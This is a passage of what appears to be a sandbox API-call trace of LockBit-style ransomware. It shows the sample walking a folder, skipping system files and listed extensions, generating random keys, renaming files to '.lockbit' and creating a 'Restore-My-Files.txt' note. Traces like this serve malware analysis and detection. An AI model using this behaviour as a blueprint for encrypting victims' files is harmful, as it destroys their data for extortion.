returned -1 [0176.036] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00918_.WMF") returned -1 [0176.036] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00918_.WMF") returned -1 [0176.036] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00918_.WMF") returned 1 [0176.036] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00918_.WMF") returned -1 [0176.037] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.037] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00918_.WMF") returned=".WMF" [0176.037] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.037] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.037] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.037] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.037] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.037] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.037] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.037] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.037] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.037] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.037] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.037] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.037] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.038] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.038] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00918_.WMF.lockbit") returned 72 [0176.038] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00918_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00918_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0176.044] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.044] malloc (_Size=0x40068) returned 0x3df0008 [0176.044] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8028) returned 1 [0176.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.045] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0176.045] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.046] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0176.046] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0176.047] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00918_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00918_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.047] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.047] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.049] free (_Block=0x1fa2ed8) [0176.049] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00918_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.049] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.049] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2944, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00935_.WMF", cAlternateFileName="")) returned 1 [0176.049] lstrcmpiW (lpString1=".", lpString2="SO00935_.WMF") returned -1 [0176.049] lstrcmpiW (lpString1="..", lpString2="SO00935_.WMF") returned -1 [0176.049] PathFindExtensionW (pszPath="SO00935_.WMF") returned=".WMF" [0176.049] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.049] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.049] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.050] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.051] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.051] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00935_.WMF") returned -1 [0176.051] lstrcmpiW (lpString1="ntldr", lpString2="SO00935_.WMF") returned -1 [0176.051] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00935_.WMF") returned -1 [0176.052] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00935_.WMF") returned -1 [0176.052] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00935_.WMF") returned -1 [0176.052] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00935_.WMF") returned 1 [0176.052] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00935_.WMF") returned -1 [0176.052] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.052] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00935_.WMF") returned=".WMF" [0176.052] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.052] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.052] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.053] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.053] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.053] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.053] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.053] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.053] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.053] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.053] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.053] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.053] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.053] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.053] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00935_.WMF.lockbit") returned 72 [0176.053] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00935_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00935_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0176.059] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.059] malloc (_Size=0x40068) returned 0x3df0008 [0176.059] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10564) returned 1 [0176.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0176.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0176.060] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.063] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00935_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00935_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.063] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.063] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.064] free (_Block=0x1fa2ed8) [0176.064] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00935_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.065] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.065] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.065] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1960, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00938_.WMF", cAlternateFileName="")) returned 1 [0176.065] lstrcmpiW (lpString1=".", lpString2="SO00938_.WMF") returned -1 [0176.065] lstrcmpiW (lpString1="..", lpString2="SO00938_.WMF") returned -1 [0176.065] PathFindExtensionW (pszPath="SO00938_.WMF") returned=".WMF" [0176.065] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.065] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.066] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.066] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00938_.WMF") returned -1 [0176.067] lstrcmpiW (lpString1="ntldr", lpString2="SO00938_.WMF") returned -1 [0176.067] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00938_.WMF") returned -1 [0176.067] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00938_.WMF") returned -1 [0176.067] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00938_.WMF") returned -1 [0176.067] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00938_.WMF") returned 1 [0176.067] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00938_.WMF") returned -1 [0176.067] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.067] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00938_.WMF") returned=".WMF" [0176.067] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.067] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.067] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.068] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.100] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.100] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.100] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.100] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.100] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.100] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.100] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.100] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.100] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.100] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.100] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.102] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.103] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.103] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.103] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.103] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.103] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.103] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.103] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.103] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.103] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.103] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00938_.WMF.lockbit") returned 72 [0176.103] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00938_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00938_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0176.105] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.105] malloc (_Size=0x40068) returned 0x3df0008 [0176.105] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6496) returned 1 [0176.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.105] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0176.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0176.106] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.108] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00938_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00938_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.108] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.108] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.109] free (_Block=0x1fa2ed8) [0176.109] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00938_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.110] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.110] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.110] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, 